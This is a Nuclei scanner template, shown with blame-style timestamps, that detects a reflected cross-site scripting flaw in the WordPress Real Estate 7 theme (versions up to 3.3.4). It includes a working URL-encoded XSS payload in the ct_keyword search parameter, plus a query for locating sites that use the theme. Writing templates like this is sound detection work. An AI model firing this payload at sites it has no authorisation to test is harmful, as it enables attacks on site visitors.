nuclei-templates/http/vulnerabilities/wordpress/wp-real-estate-xss.yaml

41 lines
2.0 KiB
YAML
Raw Normal View History

2023-08-16 16:58:53 +00:00
id: wp-real-estate-xss
2023-08-16 17:42:35 +00:00
2023-08-16 16:58:53 +00:00
info:
2023-08-16 17:42:35 +00:00
name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
2023-08-16 16:58:53 +00:00
author: Harsh
severity: medium
description: |
The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
reference:
- https://www.exploitalert.com/view-details.html?id=39344
- https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
2023-08-16 18:11:35 +00:00
- https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
2023-08-16 16:58:53 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cwe-id: CWE-79
2024-09-10 08:22:50 +00:00
cpe: cpe:2.3:a:contempothemes:real_estate_7:*:*:*:*:wordpress:*:*:*
2023-08-16 16:58:53 +00:00
metadata:
2023-08-16 19:32:52 +00:00
verified: true
2023-10-14 11:27:55 +00:00
max-request: 1
2023-08-16 19:32:52 +00:00
publicwww-query: "/wp-content/themes/realestate-7/"
2024-09-10 08:22:50 +00:00
product: real_estate_7
vendor: contempothemes
2023-10-14 11:27:55 +00:00
tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
2023-08-16 16:58:53 +00:00
http:
2023-08-16 18:11:35 +00:00
- method: GET
path:
- "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"
2023-08-16 16:58:53 +00:00
matchers:
- type: dsl
dsl:
- 'status_code == 200'
2023-08-16 18:11:35 +00:00
- 'contains(content_type, "text/html")'
2023-08-16 19:32:52 +00:00
- 'contains(body, "<img src=x onerror=prompt(document.domain)>")'
- 'contains(body, "/wp-content/themes/realestate-7/")'
2023-08-16 16:58:53 +00:00
condition: and
# digest: 4a0a0047304502206c539003b913a5aa84666f731c82c96bb3aec3f8fe23d82ea49a4f605525ecba022100de91aaf7c5e02ad1c794895f6017562d5a314e1fd3bf1e877253019f285191b3:922c64590222798bb761d5b6d8e72950